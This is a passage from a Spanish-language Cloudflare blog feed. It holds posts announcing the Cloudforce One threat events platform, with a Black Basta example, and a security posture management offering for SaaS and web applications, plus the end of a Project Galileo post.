    <p>En 2025, muchos de nuestros socios del proyecto Galileo se han enfrentado a importantes recortes de financiación, lo que ha afectado a sus operaciones y a su capacidad para apoyar a las comunidades, defender los derechos humanos y defender los valores democráticos. Garantizar el apoyo continuo a esos servicios, a pesar de los desafíos financieros y logísticos, es más importante que nunca. Agradecemos a nuestros socios de la sociedad civil que siguen ayudándonos a identificar los grupos que necesitan nuestro apoyo. Juntos, estamos trabajando para mejorar la seguridad, la resiliencia y la disponibilidad de Internet para todos. Para obtener más información sobre el proyecto Galileo y cómo apoya a las organizaciones en riesgo de todo el mundo, visita <a href="https://cloudflare.com/galileo"><u>https://www.cloudflare.com/es-es/galileo/</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Project Galileo]]></category>
            <category><![CDATA[Impacto]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Política y legal]]></category>
            <guid isPermaLink="false">7mDMJrIALhItjbx62fNSv4</guid>
            <dc:creator>Jocelyn Woolbright</dc:creator>
        </item>
        <item>
            <title><![CDATA[Mejora el contexto de la actividad de los ciberdelincuentes con nuestra plataforma de eventos de amenazas de Cloudflare One]]></title>
            <link>https://blog.cloudflare.com/es-es/threat-events-platform/</link>
            <pubDate>Tue, 18 Mar 2025 13:10:00 GMT</pubDate>
            <description><![CDATA[ Obtén información en tiempo real con nuestra nueva plataforma de eventos de amenazas  para mejorar tu protección con información práctica, anticiparte a los ataques y proteger tus activos críticos. ]]></description>
            <content:encoded><![CDATA[ <p>Hoy en día, uno de los mayores desafíos que afrontan los responsables de la ciberseguridad es analizar las detecciones de las fuentes de indicadores de amenaza, que proporcionan metadatos sobre indicadores de riesgo (IOC) específicos, como las direcciones IP, los <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>ASN</u></a>, los dominios, las URL y los hash. A pesar de la multiplicación de las fuentes de indicadores de amenaza en el sector de la información sobre amenazas, la mayoría de ellas no contienen información contextual sobre por qué incluyen un indicador determinado. Otra limitación de la mayoría de las fuentes actuales es que se centran únicamente en los indicadores que se pueden bloquear y no pueden adaptarse fácilmente a casos más complejos, como una amenaza que explota una CVE o una amenaza interna. Este tipo de información compleja sobre amenazas solo se proporciona en los informes detallados. Sin embargo, estos conllevan sus propios desafíos, como el tiempo que requiere redactarlos y editarlos, lo que puede retrasar considerablemente la publicación a tiempo de la información sobre amenazas.</p><p>Para ayudarte a resolver estos desafíos, nos complace lanzar nuestra <a href="https://developers.cloudflare.com/security-center/cloudforce-one/#analyze-threat-events"><u>plataforma de eventos de amenazas</u></a> para los clientes de Cloudforce One. Cada día, Cloudflare bloquea miles de millones de ciberamenazas. Esta nueva plataforma contiene datos contextuales sobre las amenazas que supervisamos y mitigamos en la red de Cloudflare, y está diseñada para proporcionar a los profesionales de la seguridad y a los responsables de la toma de decisiones información útil desde una perspectiva global. </p><p>De media, procesamos 71 millones de solicitudes HTTP por segundo y 44 millones de consultas DNS por segundo. Este volumen de tráfico nos proporciona información valiosa y una visión integral de las amenazas actuales (en tiempo real). La nueva plataforma de eventos de amenazas aprovecha la información sobre este tráfico para ofrecer una visión integral y en tiempo real de la actividad de las amenazas que se producen en Internet. Esto permite a los clientes de <a href="https://www.cloudflare.com/application-services/products/cloudforceone/"><u>Cloudforce One</u></a> proteger mejor sus activos y responder más eficazmente a las amenazas emergentes.</p>
    <div>
      <h3>Desarrollo de la plataforma de eventos de amenazas a partir de la información sobre el tráfico de Cloudflare</h3>
      <a href="#desarrollo-de-la-plataforma-de-eventos-de-amenazas-a-partir-de-la-informacion-sobre-el-trafico-de-cloudflare">
        
      </a>
    </div>
    <p>El gran volumen de las actividades de amenazas observadas en la red de Cloudflare sobrecargaría a cualquier analista de sistemas o SOC. Por este motivo, organizamos esta actividad en una secuencia de eventos que incluyen no solo indicadores de riesgo (IOC), sino también el contexto, lo que facilita la adopción de medidas basadas en los datos únicos de Cloudflare. Para empezar, exponemos los eventos relacionados con los ataques de <a href="https://www.cloudflare.com/en-gb/ddos/"><u>denegación de servicio</u></a> (DOS) observados en nuestra red, junto con las operaciones de amenazas avanzadas identificadas por nuestro <a href="https://www.cloudflare.com/en-gb/application-services/products/cloudforceone/"><u>equipo de información de Cloudforce One</u></a>, como la diversidad de herramientas, técnicas y procedimientos utilizados en las amenazas de las que estamos haciendo un seguimiento. Asignamos los eventos al marco <a href="https://attack.mitre.org/"><u>MITRE ATT&amp;CK</u></a> y a las etapas de la <a href="https://en.wikipedia.org/wiki/Cyber_kill_chain"><u>cadena de eliminación de seguridad cibernética</u></a>. En el futuro, añadiremos eventos relacionados con el tráfico bloqueado por nuestro <a href="https://www.cloudflare.com/application-services/products/waf/"><u>firewall de aplicaciones web</u></a> (WAF), Zero Trust <a href="https://www.cloudflare.com/zero-trust/products/gateway/"><u>Gateway</u></a>, Zero Trust <a href="https://www.cloudflare.com/zero-trust/products/email-security/"><u>Email Security</u></a> Business Email Compromise y muchos otros conjuntos de datos propios de Cloudflare. Juntos, estos eventos proporcionarán a nuestros clientes una visión detallada de la actividad de las amenazas que se producen en Internet.</p><p>Cada evento de nuestra lista de eventos de amenazas resume la actividad de amenaza específica que hemos observado, de forma similar a un <a href="https://oasis-open.github.io/cti-documentation/stix/walkthrough#-sighting-object"><u>objeto de avistamiento STIX2</u></a>, y proporciona información contextual en su vista resumida, detallada y mediante la asignación a las etapas MITRE ATT&amp;Ck y KillChain. Para ver una entrada de ejemplo, consulta la <a href="https://developers.cloudflare.com/api/resources/cloudforce_one/subresources/threat_events/"><u>documentación de la API</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GIiqbsRaSXG6G9RIeHPdQ/fe42f8c5134208b97fc2f16f33c4ee9a/image2.png" />
          </figure><p>Nuestro objetivo es ayudar a los clientes a comprender mejor el panorama de las amenazas proporcionándoles información clave que les permita investigar y abordar cuestiones generales y específicas sobre las amenazas contra su organización. Por ejemplo:</p><ul><li><p>¿Quiénes lanzan ataques contra mi vertical de negocio?</p></li><li><p>¿Quiénes lanzan ataques contra mi país?</p></li><li><p>¿Qué indicadores puedo utilizar para bloquear los ataques contra mis verticales?</p></li><li><p>¿Qué ha estado haciendo un ciberdelincuente en la cadena de eliminación de seguridad cibernética durante un periodo de tiempo?</p></li></ul><p>Cada evento tiene un identificador único que lo vincula con la actividad de amenaza identificada, lo que permite a nuestros analistas de la información sobre amenazas de Cloudforce One proporcionar contexto adicional en las investigaciones posteriores.</p>
    <div>
      <h3>Desarrollo de la plataforma de eventos de amenazas con Cloudflare Workers</h3>
      <a href="#desarrollo-de-la-plataforma-de-eventos-de-amenazas-con-cloudflare-workers">
        
      </a>
    </div>
    <p>Decidimos utilizar la <a href="https://www.cloudflare.com/developer-platform/products/"><u>plataforma para desarrolladores de Cloudflare</u></a> para desarrollar la plataforma de eventos de amenazas, ya que nos permitía aprovechar la versatilidad y la perfecta integración de Cloudflare Workers. En esencia, la plataforma es un Cloudflare Worker que utiliza <a href="https://blog.cloudflare.com/sqlite-in-durable-objects/"><u>Durable Objects respaldado por SQLite</u></a> para almacenar los eventos observados en la red de Cloudflare. Optamos por utilizar Durable Objects en lugar de <a href="https://developers.cloudflare.com/d1/"><u>D1</u></a>, la solución de base de datos SQL sin servidor de Cloudflare, porque nos permite crear dinámicamente tablas SQL donde almacenar conjuntos de datos personalizables de forma única. Este método de almacenamiento de los conjuntos de datos permite que los eventos de amenazas se distribuyan en toda nuestra red, lo que nos ofrece resiliencia ante los picos de datos que podrían estar correlacionados con la naturaleza impredecible de los ataques en Internet. También nos permite controlar los eventos según la fuente de datos, compartir un subconjunto de los conjuntos de datos con socios de confianza o restringir el acceso solo a los usuarios autorizados.  Por último, los metadatos de cada evento de amenaza individual se almacenan en Durable Object KV para que podamos almacenar los datos contextuales más allá de nuestros campos fijos de búsqueda. Estos datos pueden incluir desde el número de solicitudes por segundo en el caso de nuestros eventos de denegación de servicio hasta información que permita a los analistas de Cloudforce One vincular el evento a la actividad de amenaza exacta para una investigación más detallada.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/P2fP5IBVHYCcytcT3xI3m/f0833512bb5d12b41f350847c368e92a/image5.png" />
          </figure>
    <div>
      <h3>Utilización de los eventos de amenazas</h3>
      <a href="#utilizacion-de-los-eventos-de-amenazas">
        
      </a>
    </div>
    <p>Los clientes de Cloudforce One pueden acceder a los eventos de amenazas a través del panel de control de Cloudflare en el <a href="https://developers.cloudflare.com/security-center/"><u>Centro de seguridad</u></a> o mediante la <a href="https://developers.cloudflare.com/security-center/cloudforce-one/#analyze-threat-events"><u>API de eventos de amenazas de Cloudforce One</u></a>. Ambos exponen el flujo de actividad de amenaza que se produce en Internet tal y como lo ve Cloudflare, y se pueden personalizar mediante filtros definidos por el usuario. </p><p>En el panel de control de Cloudflare, los usuarios tienen acceso a una vista cronológica de las acciones del atacante, diseñada para responder a preguntas estratégicas, así como a una tabla de eventos más granular para acceder a información más detallada sobre el ataque. Este enfoque garantiza que los usuarios tengan la información más relevante al alcance de su mano.</p>
    <div>
      <h4>Tabla de eventos</h4>
      <a href="#tabla-de-eventos">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2QiogugKXB8rGKMZ4cYaSK/506b56c7788648456f085e9fd04d975b/image1.png" />
          </figure><p>La <a href="https://developers.cloudflare.com/security-center/cloudforce-one/#analyze-threat-events"><u>tabla de eventos</u></a> es una vista detallada del Centro de seguridad donde los usuarios pueden acceder a información más detallada sobre la actividad de amenaza específica filtrada según varios criterios. Aquí es donde los usuarios pueden explorar eventos de amenaza específicos y campañas de ciberdelincuentes utilizando la información del tráfico de Cloudflare. Y lo que es más importante, esta tabla proporcionará a nuestros usuarios indicadores de riesgo prácticos y un resumen de los eventos para que puedan proteger adecuadamente sus servicios. Todos los datos disponibles en nuestra tabla de eventos son igualmente accesibles a través de la <a href="https://developers.cloudflare.com/api/resources/cloudforce_one/subresources/threat-events/"><u>API de eventos de amenazas de Cloudforce One</u></a>. </p><p>Para mostrar la eficacia de los eventos de amenazas, analicemos un caso real:</p><p>Los chats filtrados recientemente de la organización criminal <a href="https://therecord.media/black-basta-ransomware-group-chat-logs-leaked"><u>Black Basta</u></a> expusieron detalles sobre sus víctimas, sus métodos y sus compras de infraestructura. Aunque no podemos confirmar si los chats filtrados fueron manipulados de alguna manera, pudimos verificar fácilmente la infraestructura mencionada en los chats. Como resultado, esta información sobre amenazas ahora está disponible como eventos en los eventos de amenazas, junto con un contexto adicional único de Cloudflare. </p><p>Los analistas que buscan dominios, hosts y muestras de archivos utilizados por Black Basta pueden aprovechar los eventos de amenazas para obtener valiosa información sobre las operaciones de estos ciberdelincuentes. Por ejemplo, en la interfaz de usuario de eventos de amenazas, un usuario puede filtrar la columna "Atacante" seleccionando "BlackBasta" en el menú desplegable, como se muestra en la imagen siguiente. Esto proporciona una lista organizada de direcciones IP verificadas, dominios y hash de archivos para una investigación más detallada. Para obtener información más detallada sobre la visibilidad única de Cloudflare sobre la actividad de amenaza de Black Basta, consulta nuestra publicación <a href="https://www.cloudflare.com/threat-intelligence/research/report/black-bastas-blunder-exploiting-the-gangs-leaked-chats/"><u>El error de Black Basta: explotación de los chats filtrados de la organización criminal</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3z9ZtL3n2Ssu1iqPxDF8Fg/4283854ab4cc643b6acb71eb837c944d/image4.png" />
          </figure>
    <div>
      <h3>Por qué publicamos los eventos de amenazas</h3>
      <a href="#por-que-publicamos-los-eventos-de-amenazas">
        
      </a>
    </div>
    <p>Nuestros clientes afrontan infinidad de ciberamenazas que pueden interrumpir sus operaciones y poner en riesgo sus datos confidenciales. Los ciberdelincuentes son cada vez más sofisticados, por lo que la necesidad de tener información sobre amenazas relevante y a tiempo es mayor que nunca. Por este motivo, presentamos los eventos de amenazas, que proporcionan información más detallada sobre estas amenazas. </p><p>La plataforma de eventos de amenazas tiene como objetivo llenar este vacío ofreciendo una visión más detallada y contextualizada de la actividad de amenaza en curso. Esta función permite a los analistas acceder por su cuenta a la información sobre los incidentes y analizarlos mediante filtros personalizables, por lo que pueden identificar patrones y responder de forma más eficaz. Al proporcionar acceso a los datos sobre amenazas en tiempo real, ayudamos a las organizaciones a tomar mejores decisiones sobre sus estrategias de seguridad.</p><p>Para validar el valor de nuestra plataforma de eventos de amenazas, un equipo de información sobre amenazas de la lista Fortune 20 la puso a prueba. Realizaron un análisis comparativo con otras 110 fuentes de información sobre amenazas, y consideraron a Cloudflare como la principal fuente de información sobre amenazas. Concluyeron que somos únicos en el campo de la información sobre amenazas. Todavía es pronto, pero los primeros comentarios que hemos recibido confirman que nuestra información no solo es única, sino que también ofrece un valor excepcional a los responsables de la ciberseguridad.</p>
    <div>
      <h3>¿Y ahora qué?</h3>
      <a href="#y-ahora-que">
        
      </a>
    </div>
    <p>Si bien los clientes de Cloudforce One ya tienen acceso a nuestra <a href="https://developers.cloudflare.com/api/resources/cloudforce_one/subresources/threat-events/"><u>API</u></a> y a nuestro <a href="https://dash.cloudflare.com/"><u>panel de control</u></a>, lo que les permite integrar perfectamente la información sobre amenazas en sus sistemas existentes, pronto también tendrán acceso a más visualizaciones y análisis de los eventos de amenazas que les permitirán comprender mejor sus hallazgos e informar sobre ellos. Esta próxima interfaz de usuario incluirá visualizaciones cronológicas mejoradas de los ataques, resúmenes de las campañas y gráficos de los ataques, que proporcionarán información aún más detallada sobre las amenazas que afronta tu organización. Además, añadiremos la capacidad de integración con las plataformas SIEM existentes y compartiremos los indicadores en todos los sistemas.</p><p>Aquí puedes obtener más información sobre la <a href="https://www.cloudflare.com/en-gb/threat-intelligence/"><u>investigación de la información sobre amenazas</u></a> que publica nuestro equipo, o bien puedes ponerte en contacto con tu equipo de cuenta para saber cómo aprovechar nuestros nuevos eventos de amenazas para mejorar tu postura de ciberseguridad. </p>
    <div>
      <h3>Ver en Cloudflare TV</h3>
      <a href="#ver-en-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Información sobre amenazas]]></category>
            <category><![CDATA[Cloudforce One]]></category>
            <category><![CDATA[Intel]]></category>
            <category><![CDATA[Amenazas]]></category>
            <category><![CDATA[Contexto]]></category>
            <guid isPermaLink="false">2RYDbAaANKgQEHqTUgXa9V</guid>
            <dc:creator>Alexandra Moraru</dc:creator>
            <dc:creator>Blake Darché</dc:creator>
            <dc:creator>Emilia Yoffie</dc:creator>
        </item>
        <item>
            <title><![CDATA[Una plataforma para gestionar la postura de seguridad predictiva de tu empresa con Cloudflare]]></title>
            <link>https://blog.cloudflare.com/es-es/cloudflare-security-posture-management/</link>
            <pubDate>Tue, 18 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare presenta una sola plataforma para la gestión unificada de la postura de seguridad, que ayuda a proteger las aplicaciones SaaS y web implementadas en diversos entornos.  ]]></description>
            <content:encoded><![CDATA[ <p>En el vertiginoso panorama digital actual, las empresas gestionan una combinación cada vez más compleja de entornos, que incluyen desde aplicaciones SaaS y plataformas de nube pública hasta centros de datos locales y configuraciones híbridas. Esta infraestructura tan diversa ofrece flexibilidad y escalabilidad, pero también abre nuevas superficies de ataque.</p><p>Para respaldar las necesidades relacionadas tanto con la continuidad como con la seguridad de las actividades empresariales, "la seguridad debe pasar de <a href="https://blog.cloudflare.com/welcome-to-security-week-2025/#how-can-we-help-make-the-internet-better"><u>reactiva a predictiva</u></a>". Garantizar una postura de seguridad adecuada implica supervisar y reforzar tus defensas de seguridad para identificar los riesgos, asegurar el cumplimiento normativo y protegerte contra las amenazas en constante evolución. Con nuestras funciones más recientes, ahora puedes utilizar Cloudflare para una postura de seguridad adecuada en tus aplicaciones SaaS y web. Esto responde a la pregunta final (y diaria) de cualquier equipo de seguridad: <i>¿Hasta qué punto están protegidos nuestros activos y documentos</i>?</p><p>Una postura de seguridad predictiva se basa en los siguientes componentes clave:</p><ul><li><p>Detección e inventario en tiempo real de todos tus activos y documentos</p></li><li><p>Detección continua de las amenazas y evaluación continua de los riesgos en función de los activos</p></li><li><p>Sugerencias sobre la prioridad de las correcciones para mejorar tu protección</p></li></ul><p>Hoy compartimos cómo hemos desarrollado estos componentes clave en las aplicaciones SaaS y web, y cómo puedes utilizarlos para gestionar la postura de seguridad de tu empresa.</p>
    <div>
      <h3>Resumen de tu postura de seguridad</h3>
      <a href="#resumen-de-tu-postura-de-seguridad">
        
      </a>
    </div>
    <p>Independientemente de las aplicaciones que hayas <a href="https://developers.cloudflare.com/reference-architecture/architectures/security/#using-cloudflare-to-protect-your-business"><u>conectado a</u></a> la red global de Cloudflare, Cloudflare analiza activa <a href="https://developers.cloudflare.com/security-center/security-insights/how-it-works/#scan-frequency"><u>y periódicamente</u></a> los riesgos y los errores de configuración asociados a cada una de ellas. La información sobre los riesgos y los errores de configuración identificados se muestran en el panel de control del <a href="https://dash.cloudflare.com/?to=/:account/security-center"><u>Centro de seguridad</u></a>.</p><p>La información se agrupa según la gravedad, el tipo de riesgo y la solución de Cloudflare correspondiente, y te ofrece diversas perspectivas para centrarte en aquello que más te interese. Cuando corresponde, se proporciona una solución con un solo clic para los tipos de información seleccionados, como establecer la <a href="https://developers.cloudflare.com/ssl/edge-certificates/additional-options/minimum-tls/"><u>la versión mínima de TLS</u></a> en 1.2, que es lo que <a href="https://developers.cloudflare.com/ssl/reference/protocols/#decide-which-version-to-use"><u>recomienda PCI DSS</u></a>. Esta simplicidad es valorada muy positivamente por los clientes que gestionan un conjunto cada vez mayor de activos implementados en toda la organización.</p><p>Para acelerar aún más la resolución, recientemente hemos añadido el <a href="https://www.cloudflare.com/learning/access-management/role-based-access-control-rbac/"><u>control de acceso basado en roles (RBAC)</u></a> a la página <a href="https://developers.cloudflare.com/security-center/security-insights/"><u>Información sobre seguridad</u></a> en el panel de control de Cloudflare. Ahora, cada profesional de la seguridad tiene acceso a una vista depurada de la información relevante según sus responsabilidades. Un usuario con una <a href="https://developers.cloudflare.com/fundamentals/setup/manage-members/roles/"><u>función administrativa</u></a> (un CSO, por ejemplo) puede ver y acceder a toda la información.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/bnaU55Fi2z9bxUxl5pf7o/818043fbba2ae13c5a7c4cb25e5e7ebc/1.png" />
          </figure><p>Además de la información de seguridad de toda la cuenta, también proporcionamos información general sobre la postura de seguridad que más se aproxime a las configuraciones de seguridad correspondientes de tus aplicaciones web y SaaS. Analicemos cada uno de ellos.</p>
    <div>
      <h3>Protege tus aplicaciones SaaS</h3>
      <a href="#protege-tus-aplicaciones-saas">
        
      </a>
    </div>
    <p>Sin una gestión centralizada de la postura de seguridad, las aplicaciones SaaS pueden parecer el "salvaje oeste" de la seguridad. Contienen una gran cantidad de información confidencial: archivos, bases de datos, espacios de trabajo, diseños, facturas o cualquier recurso que necesite la operativa de tu empresa, pero el control se limita a la configuración del proveedor, lo que te ofrece menos visibilidad y menos opciones de personalización. Además, los miembros del equipo crean, actualizan y eliminan constantemente el contenido que puede causar desviaciones de la configuración y la exposición de los datos, como compartir archivos públicamente, añadir información de identificación personal a bases de datos no conformes o dar acceso a integraciones de terceros. Con Cloudflare, tienes visibilidad de todo tu conjunto de aplicaciones SaaS en un solo panel de control.</p>
    <div>
      <h4>Hallazgos de la postura de seguridad en todo tu conjunto de aplicaciones SaaS</h4>
      <a href="#hallazgos-de-la-postura-de-seguridad-en-todo-tu-conjunto-de-aplicaciones-saas">
        
      </a>
    </div>
    <p>Desde la página Información de seguridad de toda la cuenta, puedes consultar la información sobre posibles problemas de seguridad de SaaS:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7JRKfYveWKayrMxdLxLvDB/1c3383209462917214ad9dc6584e98fe/2.png" />
          </figure><p>Puedes elegir detallar más con el <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/"><u>agente de seguridad de acceso a la nube (CASB)</u></a> para una revisión exhaustiva de los errores de configuración, los riesgos y los incumplimientos de las prácticas recomendadas en todo tu conjunto de aplicaciones SaaS. Puedes identificar una gran cantidad de información de seguridad que incluye, entre otros:</p><ul><li><p>Archivos disponibles públicamente o compartidos externamente</p></li><li><p>Aplicaciones de terceros con acceso de lectura o edición</p></li><li><p>Acceso de usuarios desconocidos o anónimos</p></li><li><p>Bases de datos con credenciales expuestas</p></li><li><p>Usuarios sin autenticación en dos fases</p></li><li><p>Cuentas de usuario inactivas</p></li></ul><p>También puedes explorar la página <i> Hallazgos de la postura de seguridad</i>, que facilita la búsqueda y la navegación por los documentos almacenados en las aplicaciones SaaS.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6skScbapgiG31w5qRoTCjG/ba3b069de8cce0c0bfcb9f011a2df954/3.png" />
          </figure><p>Además, puedes crear políticas para evitar desviaciones de la configuración en tu entorno. Las políticas basadas en la prevención ayudan a garantizar una configuración segura y el cumplimiento de las normas, al mismo tiempo que reducen la fatiga de alertas para los equipos de operaciones de seguridad, y estas políticas pueden evitar el movimiento inapropiado o la exfiltración de datos confidenciales. La unificación de los controles y la visibilidad en todos los entornos facilita la protección de las clases de datos regulados, el mantenimiento de registros de auditoría detallados mediante registros y la mejora de la postura de seguridad para reducir el riesgo de fugas.</p>
    <div>
      <h4>Funcionamiento: nueva detección de documentos SaaS en tiempo real</h4>
      <a href="#funcionamiento-nueva-deteccion-de-documentos-saas-en-tiempo-real">
        
      </a>
    </div>
    <p>Para proporcionar información sobre la postura de seguridad de SaaS a nuestros clientes es necesario recopilar grandes cantidades de datos de una amplia gama de plataformas. Para garantizar la seguridad de todos los documentos alojados en tus aplicaciones SaaS (archivos, diseños, etc.), debemos recopilar información sobre su configuración (¿se comparten públicamente?¿aplicaciones de terceros tienen acceso?¿está activada la <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>autenticación multifactor (MFA)</u></a>? </p><p>Anteriormente realizábamos esta tarea con los rastreadores, que extraían los datos de las API de SaaS. Sin embargo, cuando trabajábamos con conjuntos de datos más grandes teníamos problemas relacionados con los límites de velocidad de los proveedores de SaaS. Esto nos obligaba a trabajar por lotes y a ampliar y acotar el análisis según lo permitieran los proveedores. Esto generaba hallazgos obsoletos y hacía que la corrección fuera engorrosa y poco clara. Por ejemplo, brevemente después de que se eliminaran los permisos, Cloudflare informaba de que se seguía compartiendo públicamente un archivo, lo que generaba confusión para al cliente.</p><p>Para solucionar este problema, hemos actualizado nuestro proceso de recopilación de datos para que sea dinámico y en tiempo real, y para que reaccione a los cambios en tu entorno en cuanto se produzcan, ya sea un nuevo hallazgo de seguridad, un activo actualizado o una alerta crítica de un proveedor. Empezamos con nuestros <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/casb-integrations/microsoft-365/"><u>hallazgos de la postura de seguridad</u></a> y la detección de activos de Microsoft, que te ofrecen información en tiempo real sobre las configuraciones de tu centro de administración de Microsoft, OneDrive, Outlook y SharePoint. En el futuro, ampliaremos rápidamente la compatibilidad a otros proveedores de SaaS.</p>
    <div>
      <h5>Escuchar eventos de actualización de Cloudflare Workers</h5>
      <a href="#escuchar-eventos-de-actualizacion-de-cloudflare-workers">
        
      </a>
    </div>
    <p>Cloudflare Workers sirve como punto de entrada para los webhooks de proveedores, y gestiona las notificaciones de cambio de activos de servicios externos. El flujo de trabajo se desarrolla de la siguiente manera:</p><ul><li><p><b>Cliente de escucha de webhooks:</b> un Worker inicial actúa como un cliente de escucha de webhooks y recibe los mensajes de cambio de activos de los proveedores.</p></li><li><p><b>Almacenamiento de datos y puesta en cola:</b> al recibir un mensaje, el Worker carga la carga útil sin procesar de la notificación de cambio en Cloudflare R2 para su persistencia, y la publica en una cola de Cloudflare dedicada a los cambios de activos sin procesar.</p></li><li><p><b>Worker de transformación:</b> un segundo Worker, vinculado como consumidor a la cola de cambios de activos sin procesar, procesa los mensajes entrantes. Este Worker transforma los datos sin procesar específicos del proveedor a un formato genérico adecuado para CASB. A continuación, los datos transformados:</p><ul><li><p>Se almacenan en Cloudflare R2 para futuras consultas.</p></li><li><p>Se publican en otra cola de Cloudflare, designada para mensajes transformados.</p></li></ul></li></ul>
    <div>
      <h5>Procesamiento de CASB: consumidores y rastreadores</h5>
      <a href="#procesamiento-de-casb-consumidores-y-rastreadores">
        
      </a>
    </div>
    <p>Una vez que los mensajes transformados llegan a la capa CASB, se someten a un procesamiento adicional:</p><ul><li><p><b>Consumidor de sondeos:</b> CASB tiene un consumidor que sondea la cola de mensajes transformados. Al recibir un mensaje, determina el controlador relevante necesario para su procesamiento.</p></li><li><p><b>Ejecución del rastreador:</b> el controlador asigna el mensaje a un rastreador apropiado, que interactúa con la API del proveedor para obtener los detalles más actualizados de los activos.</p></li><li><p><b>Almacenamiento de datos:</b> los datos de activos recuperados se almacenan en la base de datos de CASB, lo que garantiza su accesibilidad para las comprobaciones de seguridad y de cumplimiento normativo.</p></li></ul><p>Con esta mejora, ahora procesamos entre 10 y 20 actualizaciones de Microsoft por segundo, o entre 864 000 y 1,72 millones de actualizaciones al día, lo que ofrece a los clientes una visibilidad increíblemente rápida de su entorno. No te pierdas la ampliación a otros proveedores de SaaS en los próximos meses. </p>
    <div>
      <h3>Protege tus aplicaciones web</h3>
      <a href="#protege-tus-aplicaciones-web">
        
      </a>
    </div>
    <p>Un desafío exclusivo de la seguridad de las aplicaciones web es que no hay una solución única para todos. Una gestión de la postura de seguridad en función de los activos reduce la distancia entre una solución de seguridad universal y las necesidades empresariales específicas, y ofrece recomendaciones personalizadas para que los equipos de seguridad protejan lo que realmente importa.</p>
    <div>
      <h4>Resumen de la postura de seguridad, desde los ataques hasta las amenazas y los riesgos</h4>
      <a href="#resumen-de-la-postura-de-seguridad-desde-los-ataques-hasta-las-amenazas-y-los-riesgos">
        
      </a>
    </div>
    <p>A partir de hoy, todos los clientes de Cloudflare tienen acceso a la página Información general sobre seguridad, una nueva página de destino personalizada para cada uno de tus dominios incorporados. Esta página agrega y prioriza las sugerencias de seguridad en todas tus aplicaciones web:</p><ol><li><p>Cualquier ataque (en curso) detectado que requiera atención inmediata</p></li><li><p>Disposición (mitigada, entregada por Cloudflare, entregada por origen) de todo el tráfico redireccionado mediante proxy durante los últimos 7 días</p></li><li><p>Resumen de los módulos de seguridad activos actualmente que detectan amenazas</p></li><li><p>Sugerencias sobre cómo mejorar tu postura de seguridad con una guía detallada</p></li><li><p>Y un vistazo a tus reglas de seguridad más activas y actualizadas recientemente</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3YhmhUZbZbAIZryUuTodpV/2b9563ac7768348bb4be46abc5fef7b3/4.png" />
          </figure><p>Estas sugerencias de seguridad personalizadas se muestran en función de tu perfil de tráfico y de las necesidades de tu empresa, y esto es posible gracias a la identificación de tus activos web redireccionados mediante proxy.</p>
    <div>
      <h4>Detección de activos web</h4>
      <a href="#deteccion-de-activos-web">
        
      </a>
    </div>
    <p>Muchas aplicaciones web, independientemente de su sector o caso de uso, requieren una funcionalidad similar: la identificación del usuario, la aceptación de la información de pago, etc. Al identificar los activos que proporcionan esta funcionalidad, podemos desarrollar y ejecutar la detección de amenazas específicas para su protección integral.</p><p>Por ejemplo, el tráfico de bots dirigido a páginas de marketing no tiene las mismas repercusiones para la empresa que ese mismo tráfico dirigido a las páginas de inicio de sesión. Tus materiales de marketing podrían sufrir la apropiación de contenido, que puede que quieras o no permitir, mientras que el relleno de credenciales en tu página de inicio de sesión merece atención inmediata.</p><p>Los activos web se describen mediante una lista de puntos finales; y el etiquetado de cada uno de ellos define sus objetivos empresariales. Un ejemplo sencillo pueden ser las solicitudes <code>POST</code> a la ruta <code>/portal/login</code>, que probablemente describe una API para la autenticación de usuarios. En cambio, las solicitudes <code>GET</code> a la ruta <code>/portal/login</code> indican la página web de inicio de sesión real.</p><p>Para la descripción de los objetivos empresariales de los puntos finales entran en juego las etiquetas. Las solicitudes <code>POST</code> al punto final <code>/portal/login</code> que da servicio a los usuarios finales y al punto final<code> /api/admin/login</code> utilizado por los empleados se pueden etiquetar con la misma <code>etiqueta gestionada</code><a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/#managed-labels"><u>, cf-log-in</u></a>, lo que permite a Cloudflare saber que se espera el envío de los nombres de usuario y las contraseñas a estos puntos finales.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jFh9mc7hyryXHIqeQwS9U/25ba022282b43cff9f09700d0ae81c76/5.png" />
          </figure><p>Los clientes de API Shield ya pueden utilizar el <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/"><u>etiquetado de puntos finales</u></a>. A principios del segundo trimestre de 2025, añadiremos funciones de descubrimiento y sugerencia de etiquetas, empezando con tres etiquetas ( <code>cf-log-in</code>, <code>cf-sign-up</code> y <code>cf-rss-feed</code>). Todos los demás clientes pueden añadir manualmente estas etiquetas a los <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/"><u>puntos finales guardados</u></a>. Un ejemplo, que se explica a continuación, es evitar la utilización de correos electrónicos desechables durante el registro. </p>
    <div>
      <h4>Detección de amenazas y evaluación de riesgos siempre activas</h4>
      <a href="#deteccion-de-amenazas-y-evaluacion-de-riesgos-siempre-activas">
        
      </a>
    </div>
    
    <div>
      <h5>Detección de amenazas en función de los casos de uso</h5>
      <a href="#deteccion-de-amenazas-en-funcion-de-los-casos-de-uso">
        
      </a>
    </div>
